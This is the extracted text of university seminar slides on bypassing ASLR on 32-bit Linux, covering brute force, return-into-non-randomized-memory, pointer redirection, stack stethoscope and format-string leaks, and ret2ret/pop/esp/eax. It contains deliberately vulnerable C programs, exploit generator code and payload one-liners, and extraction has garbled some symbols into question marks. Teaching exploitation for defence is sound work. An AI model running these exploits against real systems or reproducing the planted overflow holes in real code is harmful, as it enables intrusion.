aslr security


aslr security

 

Computer Science, Informatik 4 Communication and Distributed Systems ASLR Address Space Layout Randomization Seminar on Advanced Exploitation Techniques Chair of Computer Science 4 RWTH Aachen Tilo Müller Computer Science, Informatik 4 Communication and Distributed Systems What is ASLR? - A security technology to prevent exploitation of buffer overflows - Most popular alternative: Nonexecutable stack - Enabled by default since Kernel 2.6.12 (2005) / Vista Beta 2 (2006) - Earlier third party implementations: PaX (since 2000) Computer Science, Informatik 4 Communication and Distributed Systems How does ASLR work? - ASLR = Address Space Layout Randomization - Aim: Introduce randomness into the address space of each instantiation (24 bits of a 32-bit address are randomized) ? Addresses of infiltrated shellcode are not predictive anymore ? Common Exploitation techniques fail, because the place of the shellcode is unknown 1st inst. 2st inst. bfaa2e58 bf9114c8 process memory process memory stack ... ... bfaa2e14 bfaa2e10 bf911484 bf911480 Computer Science, Informatik 4 Communication and Distributed Systems How does ASLR work? unsigned long getEBP(void) { __asm__(?movl %ebp,%eax?); } int main(void) { printf(?EBP: %x ?,getEBP()); } getEBP.c Demonstration: > ./getEBP EBP:bffff3b8 > ./getEBP EBP:bffff3b8 ASLR disabled: > ./getEBP EBP:bfaa2e58 > ./getEBP EBP:bf9114c8 ASLR enabled: Computer Science, Informatik 4 Communication and Distributed Systems What is randomized? - Only the stack and libraries e.g. not the heap, text, data and bss segment Demonstration: > cat /proc/self/maps | egrep '(libc|heap|stack)' 0804d000-0806e000 rw-p 0804d000 00:00 0 [heap] b7e5e000-b7fa5000 r-xp 00000000 08:01 1971213 /lib/i686/cmov/libc-2.7.so b7fa5000-b7fa6000 r--p 00147000 08:01 1971213 /lib/i686/cmov/libc-2.7.so b7fa6000-b7fa8000 rw-p 00148000 08:01 1971213 /lib/i686/cmov/libc-2.7.so bfa0d000-bfa22000 rw-p bffeb000 00:00 0 [stack] cat /proc/self/maps | egrep '(libc|heap|stack)' 0804d000-0806e000 rw-p 0804d000 00:00 0 [heap] b7da0000-b7ee7000 r-xp 00000000 08:01 1971213 /lib/i686/cmov/libc-2.7.so b7ee7000-b7ee8000 r--p 00147000 08:01 1971213 /lib/i686/cmov/libc-2.7.so b7ee8000-b7eea000 rw-p 00148000 08:01 1971213 /lib/i686/cmov/libc-2.7.so bfa86000-bfa9b000 rw-p bffeb000 00:00 0 [stack] Computer Science, Informatik 4 Communication and Distributed Systems Overview of ASLR resistant exploits 1. Brute force 2. Return into non-randomized memory 3. Pointer redirecting 4. Stack divulging methods 5. Stack juggling methods More methods can be found in the paper (e.g. GOT hijacking or overwriting .dtors) Computer Science, Informatik 4 Communication and Distributed Systems 1. Bruteforce Success of bruteforce is based on: - The tolerance of an exploit to variations in the address space layout (e.g. how many NOPs can be placed in the buffer) - How many exploitation attempts can be performed (e.g. it is necessary that a network daemon restarts after crash) - How fast the exploitation attempts can be performed (e.g. locally vs. over network) void function(char *args) { char buff[4096]; strcpy(buff, args); } int main(int argc, char *argv[]) { function(argv[1]); return 0; } vuln.c Example: Computer Science, Informatik 4 Communication and Distributed Systems 1. Bruteforce EBP ? RIP/ bf... 4096 byte ESP ? shell- code ... NOPs plausible value RIP/ bf... shell- code ... NOPs RIP/ bf... shell- code ... NOPs miss miss hit 1 2 3 Computer Science, Informatik 4 Communication and Distributed Systems 1. Bruteforce Chance: 1 to 224 /4096 = 4096 ? 2048 attempts on average Solution: Upgrade to a 64-bit architecture #! /bin/sh while [ 0 ]; do ./vuln `./exploit $i` i=$(($i + 2048)) if [ $i ?gt 16777216 ]; then i=0 fi done; It takes about 3 minutes on a 1.5 GHz CPU to get the exploit working: ... Return Address: 0xbfa38901 ./bruteforce.sh: line 9: 19081 Segmentation fault Return Address: 0xbfa39101 sh-3.1$ Examplary bruteforce attack: Computer Science, Informatik 4 Communication and Distributed Systems Overview 1. Brute force 2. Return into non-randomized memory 3. Pointer redirecting 4. Stack divulging methods 5. Stack juggling methods Computer Science, Informatik 4 Communication and Distributed Systems 2. Return into non-randomized memory not randomized randomized ? Exploitation Techniques: ret2heap ret2bss ret2data ret2text - Stack: parameters and dynamic local variables - Heap: dynamically created data structures (malloc) - BSS: uninitialized global and static local variables - Data: initialized global and static local variables - Text: readonly program code Computer Science, Informatik 4 Communication and Distributed Systems 2a. ret2text The text region is marked readonly ? it is just possible to manipulate the program flow (advanced: borrowed code) void public(char* args) { char buff[12]; strcpy(buff,args); printf(?public ?); } void secret(void) { printf(?secret ?); } int main(int argc, char* argv[]) { if (getuid() == 0) secret(); else public(argv[1]); } vuln.c Example: Computer Science, Informatik 4 Communication and Distributed Systems 2a. ret2text #! /bin/bash ./vuln `perl -e 'print "A"x16; print "\xfa\x83\x04\x08"'` exploit.sh ... stack text RIP / 0x080483fa SFP / AAAA buff / AAAA 0x080483fa: void secret(void) Computer Science, Informatik 4 Communication and Distributed Systems 2b. ret2bss char globalbuf[256]; void function(char* input) { char localbuf[256]; strcpy(localbuf, input); strcpy(globalbuf, localbuf); } int main(int argc, char** argv) { function(argv[1]); } vuln.c - The bss segment contains the uninitialized global variables: - Two buffers are needed, one on the stack and one in the bss segment Computer Science, Informatik 4 Communication and Distributed Systems 2b. ret2bss ... stack (randomized) bss (not randomized) 0x080495e0 AAAA AAAA 0x080495e0: global buff local buff shellcode shellcode AAAA RIP SFP Computer Science, Informatik 4 Communication and Distributed Systems 2c. ret2data 2d. ret2heap Similar to ret2bss. Examples of vulnerable code: - Data: Initialized global variables - Heap: Dynamically created data structures char* globalbuf = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?; void function(char* input) { char localbuf[256]; strcpy(localbuf, input); strcpy(globalbuf, localbuf); } void function(char* input) { char local_buff[256]; char *heap_buff; strcpy(local_buff,input); heap_buff = (char *) malloc(sizeof(local_buff)); strcpy(heap_buff,local_buff); } Computer Science, Informatik 4 Communication and Distributed Systems Overview 1. Brute force 2. Return into non-randomized memory 3. Pointer redirecting 4. Stack divulging methods 5. Stack juggling methods Computer Science, Informatik 4 Communication and Distributed Systems 3. Pointer redirecting - Hardcoded strings are saved within non-randomized areas ? It is possible to redirect a string pointer to another one - Interesting string pointers are arguments of system, execve, ... - Example: int main(int argc, char* args[]) { char input[256]; char *conf = "test -f ~/.progrc"; char *license = "THIS SOFTWARE IS PROVIDED... "; printf(license); strcpy(input,args[1]); if (system(conf)) printf("Error: missing .progrc "); } vuln.c Goal: Execute system(?THIS SOFTWARE IS... ?); ? system tries to execute THIS ? write a script called THIS, e.g.: #! /bin/bash /bin/bash Computer Science, Informatik 4 Communication and Distributed Systems 3. Pointer redirecting ... stack data input *conf *license 0x08048562 0x08048550 THIS SOFTWARE IS ... test -f ~/.progrc system(conf) = system(?test -f ~/.progrc?) Computer Science, Informatik 4 Communication and Distributed Systems 3. Pointer redirecting ... stack data input *conf *license 0x08048562 0x08048562 THIS SOFTWARE IS ... test -f ~/.progrc system(conf) = system(?THIS SOFTWARE IS...?) AAAA Computer Science, Informatik 4 Communication and Distributed Systems 3. Pointer redirecting int main(int argc, char* args[]) { char input[256]; char *conf = "test -f ~/.progrc"; char *license = "THIS SOFTWARE IS PROVIDED... "; printf(license); strcpy(input,args[1]); if (system(conf)) printf("Error: missing .progrc "); } vuln.c #! /bin/sh echo "/bin/sh" > THIS chmod 777 THIS PATH=.:$PATH ./vuln `perl -e 'print "A"x256; print "\x62\x85\x04\x08"x2'` exploit.sh Computer Science, Informatik 4 Communication and Distributed Systems Overview 1. Brute force 2. Return into non-randomized memory 3. Pointer redirecting 4. Stack divulging methods 5. Stack juggling methods Computer Science, Informatik 4 Communication and Distributed Systems 4. Stack divulging methods #define SA struct sockaddr int listenfd, connfd; void function(char* str) { char readbuf[256]; char writebuf[256]; strcpy(readbuf,str); sprintf(writebuf,readbuf); write(connfd,writebuf,strlen(writebuf)); } int main(int argc, char* argv[]) { char line[1024]; struct sockaddr_in servaddr; ssize_t n; listenfd = socket (AF_INET, SOCK_STREAM, 0); bzero(&servaddr, sizeof(servaddr)); servaddr.sin_family = AF_INET; servaddr.sin_addr.s_addr = htonl(INADDR_ANY); servaddr.sin_port = htons(7776); bind(listenfd, (SA*)&servaddr, sizeof(servaddr)); listen(listenfd, 1024); for(;;) { connfd = accept(listenfd, (SA*)NULL,NULL); write(connfd,"> ",2); n = read(connfd, line, sizeof(line)-1); line[n] = 0; function(line); close(connfd); } } vuln.c - Goal: Discover informations about the address space layout - Possibility 1: Stack stethoscope (/proc/<pid>/stat) - Possibility 2: Format string vulnerabilities Computer Science, Informatik 4 Communication and Distributed Systems 4a. Stack stethoscope - Address of a process stack's bottom: 28th item of /proc/<pid>/stat - The remaining stack can be calculated, since offsets are constant - The stat-file is readable by every user per default: > dir /proc/$(pidof vuln)/stat -r--r--r-- 1 2008-02-26 22:01 /proc/12356/stat - Disadvantage:Access to the machine is required Advantage: ASLR is almost useless if one have this access Computer Science, Informatik 4 Communication and Distributed Systems 4a. Stack stethoscope stack bottom ... function main SFP RIP readbuf writebuf constant offset (bfe14f30 ? bfe14858 = 6d8) Computer Science, Informatik 4 Communication and Distributed Systems 4a. Stack stethoscope stack bottom function main SFP RIP readbuf writebuf shellcode sb - offset sb = cat /proc/$(pidof vuln)/stat | awk '{ print $28 }' offset = 6d8 ... Computer Science, Informatik 4 Communication and Distributed Systems 4b. Format strings #define SA struct sockaddr int listenfd, connfd; void function(char* str) { char readbuf[256]; char writebuf[256]; strcpy(readbuf,str); sprintf(writebuf,readbuf); write(connfd,writebuf,strlen(writebuf)); } int main(int argc, char* argv[]) { char line[1024]; struct sockaddr_in servaddr; ssize_t n; listenfd = socket (AF_INET, SOCK_STREAM, 0); bzero(&servaddr, sizeof(servaddr)); servaddr.sin_family = AF_INET; servaddr.sin_addr.s_addr = htonl(INADDR_ANY); servaddr.sin_port = htons(7776); bind(listenfd, (SA*)&servaddr, sizeof(servaddr)); listen(listenfd, 1024); for(;;) { connfd = accept(listenfd, (SA*)NULL,NULL); write(connfd,"> ",2); n = read(connfd, line, sizeof(line)-1); line[n] = 0; function(line); close(connfd); } } vuln.c ? Format string vulnerability, that can be used to receive stack addresses Correct: sprintf(writebuf,?%s?,readbuf); Advantage: No access to the machine is required. Computer Science, Informatik 4 Communication and Distributed Systems sprintf() function() SFP RIP %20$x ... ... bfb71ec8 20th parameter above the format string ... stack bottom constant offset bfb72550 - bfb71ec8 = 688 4b. Format strings ? The stack bottom can be calculated by an exploitation of the format string vulnerability ? Afterwards the exploit from the stethoscope attack can be used again Example: > echo "%20\$x" | \ > nc localhost 7776 > bfb71ec8 Computer Science, Informatik 4 Communication and Distributed Systems Overview 1. Brute force 2. Return into non-randomized memory 3. Pointer redirecting 4. Stack divulging methods 5. Stack juggling methods Computer Science, Informatik 4 Communication and Distributed Systems Based on a pointer that is a potential pointer to the shellcode. SFP RIP buff Pointer ... 5a. ret2ret Computer Science, Informatik 4 Communication and Distributed Systems A potential pointer points to the shellcode if its last significant byte is overwritten by zero (string termination). But how to use this aligned pointer as return instruction pointer? ?? Pointer x00 ?? buff NOPs ... shellcode ... 5a. ret2ret Computer Science, Informatik 4 Communication and Distributed Systems Solution: chain of ret's. ret can be found in the text segment (which is not randomized) &ret Pointer x00 &ret buff NOPs ... shellcode ... 5a. ret2ret Computer Science, Informatik 4 Communication and Distributed Systems &ret Pointer x00 &ret buff NOPs ... shellcode ... 5a. ret2ret ESP ? EIP ? EBP ? b() a() leave = movl %ebp,%esp popl %ebp ret = popl %eip function epliogue of b: Computer Science, Informatik 4 Communication and Distributed Systems &ret Pointer x00 &ret buff NOPs ... shellcode ... 5a. ret2ret ESP ? EIP ? EBP ? b() a() leave = movl %ebp,%esp popl %ebp ret = popl %eip Computer Science, Informatik 4 Communication and Distributed Systems &ret Pointer x00 &ret buff NOPs ... shellcode ... 5a. ret2ret ESP ? EIP ? EBP ? ??? b() a() leave = movl %ebp,%esp popl %ebp ret = popl %eip Computer Science, Informatik 4 Communication and Distributed Systems &ret Pointer x00 &ret buff NOPs ... shellcode ... 5a. ret2ret ESP ? EIP ? EBP ? ??? b() a() leave = movl %ebp,%esp popl %ebp ret = popl %eip Computer Science, Informatik 4 Communication and Distributed Systems &ret Pointer x00 &ret buff NOPs ... shellcode ... 5a. ret2ret ESP ? EIP ? EBP ? ??? b() a() leave = movl %ebp,%esp popl %ebp ret = popl %eip Computer Science, Informatik 4 Communication and Distributed Systems &ret Pointer x00 &ret buff NOPs ... shellcode ... 5a. ret2ret ESP ? EIP ? EBP ? ??? b() a() leave = movl %ebp,%esp popl %ebp ret = popl %eip Computer Science, Informatik 4 Communication and Distributed Systems &ret Pointer x00 &ret buff NOPs ... shellcode ... 5a. ret2ret ESP ? EIP ? EBP ? ??? b() a() leave = movl %ebp,%esp popl %ebp ret = popl %eip Computer Science, Informatik 4 Communication and Distributed Systems &ret Pointer x00 &ret buff NOPs ... shellcode ... 5a. ret2ret ESP ? EIP ? EBP ? ??? b() a() leave = movl %ebp,%esp popl %ebp ret = popl %eip Computer Science, Informatik 4 Communication and Distributed Systems vuln.c #define RET 0x0804840f int main(void) { char *buff, *ptr; long *adr_ptr; int buf_size = 280; int ret_size = 20; buff = malloc(buf_size); ptr = buff; adr_ptr = (long *) ptr; for (i=0; i<buf_size; i+=4) *(adr_ptr++) = RET; for (i=0; i<buf_size-ret_size; i++) buff[i] = NOP; ptr = buff + (buf_size-ret_size- strlen(shellcode)); for (i=0; i<strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[buf_size] = '\0'; printf("%s",buff); return 0; } exploit.c void function(char* overflow) { char buffer[256]; strcpy(buffer, overflow); } int main(int argc, char** argv) { int no = 1; int* ptr = &no; function(argv[1]); return 1; } 5a. ret2ret Computer Science, Informatik 4 Communication and Distributed Systems After strcpy the shellcode is stored redundant in the memory. Idea: Use a perfect pointer to the shellcode placed in argv. SFP RIP buff Pointer argv shellcode ... 5b. ret2pop EIP = Computer Science, Informatik 4 Communication and Distributed Systems Problem: Avoid overwriting the last significant byte of the perfect pointer by zero. SFP RIP buff argv Pointer x00 X 5b. ret2pop ... shellcode Computer Science, Informatik 4 Communication and Distributed Systems Solution: A ret-chain followed by pop-ret. The pop instruction skips over the memory location which is overwritten by zero. ... &ret buff Pointer x00 shellcode &pop-ret ... 5b. ret2pop argv ... shellcode Computer Science, Informatik 4 Communication and Distributed Systems vuln.c #define POPRET 0x08048467 #define RET 0x08048468 int main(void) { char *buff, *ptr; long *adr_ptr; int i; buff = malloc(264); for (i=0; i<264; i++) buff[i] = 'A'; ptr = buff+260; adr_ptr = (long *) ptr; for (i=260; i<264; i+=4) if (i == 260) *(adr_ptr++) = POPRET; else *(adr_ptr++) = RET; ptr = buff; for (i=0; i<strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[264] = '\0'; printf("%s",buff); return 0; } int function(int x, char *str) { char buf[256]; strcpy(buf,str); return x; } int main(int argc, char **argv) { function(64, argv[1]); return 1; } exploit.c 5b. ret2pop Computer Science, Informatik 4 Communication and Distributed Systems The position of the ESP is predictable during the function epilogue. ? jmp *%esp EBP ? ESP ? SFP RIP buff 5c. ret2esp Computer Science, Informatik 4 Communication and Distributed Systems The position of the ESP is predictable during the function epilogue. ? jmp *%esp EBP ? ESP ? ... buff shellcode ... 5c. ret2esp &jmp *%esp Computer Science, Informatik 4 Communication and Distributed Systems EBP ? ESP ? ... buff shellcode ... 5c. ret2esp leave = movl %ebp,%esp popl %ebp ret = popl %eip stack text segment function epilogue: ? EIP jmp *esp somewhere: ... &jmp *%esp ... Computer Science, Informatik 4 Communication and Distributed Systems EBP ? ESP ? ... buff shellcode ... 5c. ret2esp leave = movl %ebp,%esp popl %ebp ret = popl %eip stack text segment function epilogue: ? EIP jmp *esp somewhere: &jmp *%esp Computer Science, Informatik 4 Communication and Distributed Systems EBP ? ? ESP ? ... buff shellcode ... 5c. ret2esp leave = movl %ebp,%esp popl %ebp ret = popl %eip stack text segment function epilogue: ? EIP jmp *esp somewhere: ... &jmp *%esp ... Computer Science, Informatik 4 Communication and Distributed Systems ESP ? ... buff shellcode ... 5c. ret2esp leave = movl %ebp,%esp popl %ebp ret = popl %eip stack text segment function epilogue: ? EIP jmp *esp somewhere: EBP ? ? ... &jmp *%esp ... Computer Science, Informatik 4 Communication and Distributed Systems ESP ? ... &jmp *%esp buff shellcode ... 5c. ret2esp leave = movl %ebp,%esp popl %ebp ret = popl %eip stack text segment function epilogue: EIP ? jmp *%esp somewhere: EBP ? ? Computer Science, Informatik 4 Communication and Distributed Systems 5c. ret2esp Problem: jmp *%esp is not produced by gcc Solution: Search the hexdump of a binary after e4ff, which will be interpreted as jmp *%esp. Example: The hardcoded number 58623dec = e4ffhex The chance to find e4ff in practice is increased by the size of a binray. > hexdump /usr/bin/* | grep e4ff | wc -l 1183 Computer Science, Informatik 4 Communication and Distributed Systems #define JMP2ESP 0x080483e8 int main(void) { char *buff, *ptr; long *adr_ptr; int i; buff = malloc(264); ptr = buff; adr_ptr = (long *)ptr; for (i=0; i<264+strlen(shellcode); i+=4) *(adr_ptr++) = JMP2ESP; ptr = buff+264; for (i=0; i<strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[264+strlen(shellcode)] = '\0'; printf("%s",buff); return 0; } void function(char* str) { char buf[256]; strcpy(buf,str); } int main(int argc, char** argv) { int j = 58623; function(argv[1]); return 1; } vuln.c exploit.c 5c. ret2esp Computer Science, Informatik 4 Communication and Distributed Systems Return values are stored in EAX. ? EAX could contain a perfect shellcode pointer after a function returns a pointer to user input. ? Overwrite RIP by a pointer to a call *%eax instruction Example: strcpy(buf,str) returns a pointer to buf, i.e. bufptr = strcpy(buf,str); effects EAX and bufptr to point to the same location as buf 5d. ret2eax vuln.c void function(char* str) { char buf[256]; strcpy(buf, str); } int main(int argc, char **argv) { function(argv[1]); return 1; } Computer Science, Informatik 4 Communication and Distributed Systems EBP ? ESP ? RIP SFP buf 5d. ret2eax EAX = ? void function(char* str) { char buf[256]; strcpy(buf, str); } int main(int argc, char **argv) { function(argv[1]); return 1; } main() function() Computer Science, Informatik 4 Communication and Distributed Systems EBP ? ESP ? RIP SFP buf 5d. ret2eax EAX = ? void function(char* str) { char buf[256]; strcpy(buf, str); } int main(int argc, char **argv) { function(argv[1]); return 1; } main() function() strcpy() ... SFP RIP Computer Science, Informatik 4 Communication and Distributed Systems EBP ? ESP ? buf 5d. ret2eax EAX = ? void function(char* str) { char buf[256]; strcpy(buf, str); } int main(int argc, char **argv) { function(argv[1]); return 1; } main() function() strcpy() ... SFP RIP &call *%eax shellcode ... ... ... Computer Science, Informatik 4 Communication and Distributed Systems EBP ? ESP ? buf 5d. ret2eax EAX ? void function(char* str) { char buf[256]; strcpy(buf, str); } int main(int argc, char **argv) { function(argv[1]); return 1; } main() function() shellcode ... ... ... &call *%eax Computer Science, Informatik 4 Communication and Distributed Systems EBP ? ESP ? buf 5d. ret2eax EAX ? void function(char* str) { char buf[256]; strcpy(buf, str); } int main(int argc, char **argv) { function(argv[1]); return 1; } main() function() shellcode ... ... ... leave = movl %ebp,%esp popl %ebp ret = popl %eip ? EIP &call *%eax Computer Science, Informatik 4 Communication and Distributed Systems EBP ? ESP ? buf 5d. ret2eax EAX ? void function(char* str) { char buf[256]; strcpy(buf, str); } int main(int argc, char **argv) { function(argv[1]); return 1; } main() function() shellcode ... ... ... leave = movl %ebp,%esp popl %ebp ret = popl %eip ? EIP &call *%eax Computer Science, Informatik 4 Communication and Distributed Systems EBP = ? ESP ? buf 5d. ret2eax EAX ? void function(char* str) { char buf[256]; strcpy(buf, str); } int main(int argc, char **argv) { function(argv[1]); return 1; } main() function() shellcode ... ... ... leave = movl %ebp,%esp popl %ebp ret = popl %eip ? EIP &call *%eax Computer Science, Informatik 4 Communication and Distributed Systems EBP = ? ESP ? buf 5d. ret2eax EAX ? void function(char* str) { char buf[256]; strcpy(buf, str); } int main(int argc, char **argv) { function(argv[1]); return 1; } main() function() shellcode ... ... ... &call *%eax leave = movl %ebp,%esp popl %ebp ret = popl %eip ? EIP call *%eax Computer Science, Informatik 4 Communication and Distributed Systems EBP = ? ESP ? buf 5d. ret2eax EAX ? void function(char* str) { char buf[256]; strcpy(buf, str); } int main(int argc, char **argv) { function(argv[1]); return 1; } main() function() shellcode ... ... ... &call *%eax leave = movl %ebp,%esp popl %ebp ret = popl %eip call *%eax EIP ? Computer Science, Informatik 4 Communication and Distributed Systems EBP = ? ESP ? buf 5d. ret2eax EAX ? void function(char* str) { char buf[256]; strcpy(buf, str); } int main(int argc, char **argv) { function(argv[1]); return 1; } main() function() shellcode ... ... ... &call *%eax leave = movl %ebp,%esp popl %ebp ret = popl %eip call *%eax EIP ? Computer Science, Informatik 4 Communication and Distributed Systems vuln.c #define CALLEAX 0x08048453 int main(void) { char *buff, *ptr; long *adr_ptr; buff = malloc(264); ptr = buff; adr_ptr = (long *)ptr; for (i=0; i<264; i+=4) *(adr_ptr++) = CALLEAX; ptr = buff; for (i=0; i<strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[264] = '\0'; printf("%s",buff); } exploit.c void function(char* str) { char buf[256]; strcpy(buf, str); } int main(int argc, char **argv) { function(argv[1]); } 5d. ret2eax > objdump -D vuln | grep -B 2 "call" 804844f: 74 12 je 8048463 8048451: 31 db xor %ebx,%ebx 8048453: ff d0 call *%eax Find &call *%eax: Computer Science, Informatik 4 Communication and Distributed Systems Summary 1. Brute force 2. Return into non-randomized memory a) ret2text b) ret2bss c) ret2data d) ret2heap 3. Pointer redirecting a) String pointer 4. Stack divulging methods a) Stack stethoscope b) Formatstring vulnerabilities 5. Stack juggling methods a) ret2ret b) ret2pop c) ret2esp d) ret2eax Computer Science, Informatik 4 Communication and Distributed Systems Summary 1. Brute force 2. Return into non-randomized memory a) ret2text b) ret2bss c) ret2data d) ret2heap 3. Pointer redirecting a) String pointer 4. Stack divulging methods a) Stack stethoscope b) Formatstring vulnerabilities 5. Stack juggling methods a) ret2ret b) ret2pop c) ret2esp d) ret2eax Additional in the paper: - DoS by format string vulnerabilities - Redirecting function pointers - Integer overflows - GOT and PLT hijacking - Off by one - Overwriting .dtors

PARTAGER SUR

Envoyer le lien par email
665
READS
0
DOWN
0
FOLLOW
4
EMBED
DOCUMENT # TAGS
#security  #aslr 

licence non indiquée


DOCUMENT # INDEX
Technologies, Informatique 
img

Partagé par  securedocsangelina

 Suivre

Auteur:
Source:Non communiquée